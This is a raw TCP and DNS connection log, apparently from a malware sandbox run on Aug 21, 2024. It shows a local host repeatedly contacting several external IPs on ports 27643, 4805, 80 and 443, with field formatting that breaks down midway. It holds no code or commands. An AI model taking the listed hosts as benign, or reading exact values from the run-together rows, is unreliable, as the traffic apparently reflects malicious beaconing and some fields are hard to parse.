Aug 21, 2024 11:00:20.885211945 CEST | 60086 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:20.890290022 CEST | 27643 | 60086 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:20.890398979 CEST | 60086 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:20.890588045 CEST | 60086 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:20.895347118 CEST | 27643 | 60086 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:20.945439100 CEST | 4805 | 60084 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:20.945506096 CEST | 60084 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:20.945822001 CEST | 60084 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:21.722847939 CEST | 27643 | 60086 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:21.722917080 CEST | 60086 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:21.723213911 CEST | 60086 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:23.868835926 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:23.868896008 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:23.869004011 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:23.869343996 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:23.869363070 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:24.275254011 CEST | 60085 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:24.280973911 CEST | 60088 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:24.285878897 CEST | 80 | 60088 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:24.285978079 CEST | 60088 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:24.286206961 CEST | 60088 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:24.291114092 CEST | 80 | 60088 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:24.329468012 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:24.330786943 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:24.330801964 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:24.456543922 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:24.456615925 CEST | 443 | 60087 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:24.456770897 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:24.457314968 CEST | 60087 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:25.963556051 CEST | 60089 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:25.969008923 CEST | 4805 | 60089 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:25.972049952 CEST | 60089 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:25.972049952 CEST | 60089 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:25.976913929 CEST | 4805 | 60089 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:26.819545031 CEST | 60090 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:27.391869068 CEST | 27643 | 60090 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:27.391957998 CEST | 60090 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:27.392241955 CEST | 60090 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:27.397074938 CEST | 27643 | 60090 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:27.678234100 CEST | 4805 | 60089 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:27.678376913 CEST | 60089 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:27.678605080 CEST | 60089 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:28.221169949 CEST | 27643 | 60090 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:28.221488953 CEST | 60090 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:28.221735001 CEST | 60090 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:28.289953947 CEST | 60088 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:28.296996117 CEST | 60091 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:28.303402901 CEST | 80 | 60091 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:28.303484917 CEST | 60091 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:28.304342031 CEST | 60091 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:28.309106112 CEST | 80 | 60091 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:29.464813948 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:29.464870930 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:29.465096951 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:29.465527058 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:29.465539932 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:29.951385021 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:29.985538006 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:29.985559940 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:30.101145983 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:30.101222992 CEST | 443 | 60092 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:30.101284981 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:30.101813078 CEST | 60092 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:32.305962086 CEST | 60091 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:32.308760881 CEST | 60093 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:32.692955017 CEST | 60094 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:33.228857994 CEST | 60095 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:33.302145004 CEST | 80 | 60093 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:33.302160025 CEST | 4805 | 60094 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:33.302171946 CEST | 27643 | 60095 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:33.302268028 CEST | 60095 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:33.302269936 CEST | 60094 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:33.302289009 CEST | 60093 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:33.302762985 CEST | 60094 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:33.302808046 CEST | 60095 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:33.303833008 CEST | 60093 | 80 | 192.168.2.4 | 45.9.20.13
Aug 21, 2024 11:00:33.307490110 CEST | 4805 | 60094 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:33.307518005 CEST | 27643 | 60095 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:33.308640957 CEST | 80 | 60093 | 45.9.20.13 | 192.168.2.4
Aug 21, 2024 11:00:34.118887901 CEST | 27643 | 60095 | 45.142.215.47 | 192.168.2.4
Aug 21, 2024 11:00:34.118999004 CEST | 60095 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:34.119190931 CEST | 60095 | 27643 | 192.168.2.4 | 45.142.215.47
Aug 21, 2024 11:00:35.006993055 CEST | 4805 | 60094 | 135.181.129.119 | 192.168.2.4
Aug 21, 2024 11:00:35.007092953 CEST | 60094 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:35.007448912 CEST | 60094 | 4805 | 192.168.2.4 | 135.181.129.119
Aug 21, 2024 11:00:35.119065046 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:35.119110107 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.119318008 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:35.119610071 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:35.119626999 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.601358891 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.603521109 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:35.603555918 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.757251978 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.757324934 CEST | 443 | 60096 | 162.159.130.233 | 192.168.2.4
Aug 21, 2024 11:00:35.757374048 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:35.769927979 CEST | 60096 | 443 | 192.168.2.4 | 162.159.130.233
Aug 21, 2024 11:00:37.305393934 CEST | 60093 | 80 | 192.168.2.4 | 45.9.20.13
                                      Aug 21, 2024 11:00:37.309942961 CEST6009780192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:37.314745903 CEST806009745.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:37.314985991 CEST6009780192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:37.315577984 CEST6009780192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:37.320318937 CEST806009745.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:39.135442019 CEST6009827643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:39.140388966 CEST276436009845.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:39.140475988 CEST6009827643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:39.141016006 CEST6009827643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:39.146059036 CEST276436009845.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:39.954407930 CEST276436009845.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:39.954494953 CEST6009827643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:39.954663038 CEST6009827643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:40.010590076 CEST600994805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:40.015801907 CEST480560099135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:40.015894890 CEST600994805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:40.016149998 CEST600994805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:40.021323919 CEST480560099135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:40.775310993 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:40.775366068 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:40.775450945 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:40.775717020 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:40.775731087 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:41.240873098 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:41.266570091 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:41.266602039 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:41.398828030 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:41.398919106 CEST44360100162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:41.399004936 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:41.504421949 CEST60100443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:41.569506884 CEST6009780192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:41.599793911 CEST6010180192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:41.604778051 CEST806010145.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:41.606090069 CEST6010180192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:41.617697954 CEST6010180192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:41.622997999 CEST806010145.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:41.724925041 CEST480560099135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:41.725019932 CEST600994805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:41.725239992 CEST600994805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:44.963546991 CEST6010227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:44.968542099 CEST276436010245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:44.968614101 CEST6010227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:44.968874931 CEST6010227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:44.973905087 CEST276436010245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:45.634104013 CEST6010180192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:45.638643980 CEST6010380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:45.645387888 CEST806010345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:45.645448923 CEST6010380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:45.645688057 CEST6010380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:45.651056051 CEST806010345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:45.793092966 CEST276436010245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:45.793219090 CEST6010227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:45.793426991 CEST6010227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:46.527308941 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:46.527360916 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:46.527508974 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:46.527924061 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:46.527940989 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:46.729387999 CEST601054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:46.734848022 CEST480560105135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:46.734956026 CEST601054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:46.735181093 CEST601054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:46.739934921 CEST480560105135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:47.027714968 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:47.028816938 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:47.028846979 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:47.184524059 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:47.184614897 CEST44360104162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:47.184696913 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:47.185033083 CEST60104443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:48.444056988 CEST480560105135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:48.444127083 CEST601054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:48.444317102 CEST601054805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:49.650538921 CEST6010380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:49.654359102 CEST6010680192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:49.659276009 CEST806010645.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:49.659373045 CEST6010680192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:49.659532070 CEST6010680192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:49.664275885 CEST806010645.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:50.807653904 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:50.812928915 CEST276436010745.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:50.813383102 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:50.813635111 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:50.818989992 CEST276436010745.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:51.630851984 CEST276436010745.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:51.631364107 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:51.631546974 CEST6010727643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:52.196746111 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.196803093 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.196907997 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.197216988 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.197235107 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.681055069 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.683119059 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.683170080 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835329056 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835417986 CEST44360108162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:52.835681915 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:52.835984945 CEST60108443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:53.447602987 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.452699900 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:53.455460072 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.666393995 CEST6010680192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.670577049 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.675506115 CEST806011045.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:53.675568104 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.676177025 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:53.681036949 CEST806011045.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:53.920233011 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:53.925108910 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:55.184710026 CEST480560109135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:00:55.184779882 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:55.185152054 CEST601094805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:00:56.635413885 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.640284061 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:56.643357038 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.643630028 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:56.648499966 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:57.460186958 CEST276436011145.142.215.47192.168.2.4
                                      Aug 21, 2024 11:00:57.463380098 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:57.464523077 CEST6011127643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:00:57.690083981 CEST6011080192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.837555885 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.837666035 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:57.837770939 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.838205099 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:57.838238955 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:57.841602087 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.846538067 CEST806011345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:57.846627951 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.847359896 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:00:57.852387905 CEST806011345.9.20.13192.168.2.4
                                      Aug 21, 2024 11:00:58.340399981 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.341624022 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:58.341702938 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477515936 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477696896 CEST44360112162.159.130.233192.168.2.4
                                      Aug 21, 2024 11:00:58.477808952 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:00:58.478279114 CEST60112443192.168.2.4162.159.130.233
                                      Aug 21, 2024 11:01:00.386986017 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.392251015 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:00.393368006 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.395479918 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:00.400446892 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:01.853398085 CEST6011380192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.857007027 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.863511086 CEST806011545.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:01.863605022 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.863835096 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:01.871263981 CEST806011545.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:02.082735062 CEST480560114135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:02.082808971 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:02.083126068 CEST601144805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:02.479187965 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.484055996 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:02.484128952 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.484380960 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:02.489238024 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:03.308873892 CEST276436011645.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:03.309583902 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:03.310839891 CEST6011627643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:03.546715021 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.546782970 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:03.547092915 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.547548056 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:03.547565937 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.032088041 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.033895016 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:04.033915997 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164710999 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164803982 CEST44360117162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:04.164905071 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:04.165734053 CEST60117443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:05.881179094 CEST6011580192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:05.993206978 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:05.999483109 CEST806011845.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:05.999664068 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:06.001876116 CEST6011880192.168.2.445.9.20.13
                                      Aug 21, 2024 11:01:06.008100986 CEST806011845.9.20.13192.168.2.4
                                      Aug 21, 2024 11:01:07.088742018 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.094252110 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:07.094376087 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.094640017 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:07.100614071 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:08.802195072 CEST480560119135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:08.802597046 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:11.240359068 CEST601194805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.245237112 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.250394106 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:16.250466108 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.250648975 CEST601204805192.168.2.4135.181.129.119
                                      Aug 21, 2024 11:01:16.255845070 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:16.353676081 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.353724957 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.353789091 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.354015112 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:16.354022026 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.541816950 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.547168016 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:16.547252893 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.547461987 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:16.552284956 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:16.822139025 CEST44360121162.159.133.233192.168.2.4
                                      Aug 21, 2024 11:01:16.867852926 CEST60121443192.168.2.4162.159.133.233
                                      Aug 21, 2024 11:01:17.388575077 CEST276436012245.142.215.47192.168.2.4
                                      Aug 21, 2024 11:01:17.388673067 CEST6012227643192.168.2.445.142.215.47
                                      Aug 21, 2024 11:01:17.985362053 CEST480560120135.181.129.119192.168.2.4
                                      Aug 21, 2024 11:01:17.985656023 CEST601204805192.168.2.4135.181.129.119
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                      Aug 21, 2024 11:00:00.754420042 CEST53513381.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:05.743555069 CEST6114353192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:05.751183033 CEST53611431.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:10.744560003 CEST5812453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:10.756506920 CEST53581241.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:15.744064093 CEST4982453192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:15.752898932 CEST53498241.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:20.743937969 CEST5349853192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:20.751422882 CEST53534981.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:25.743568897 CEST5081553192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:25.751151085 CEST53508151.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:30.744314909 CEST5956953192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:30.805304050 CEST5956953192.168.2.41.1.1.1
                                      Aug 21, 2024 11:00:31.242646933 CEST53595691.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:31.242655039 CEST53595691.1.1.1192.168.2.4
                                      Aug 21, 2024 11:00:35.753916025 CEST6479753192.168.2.41.1.1.1
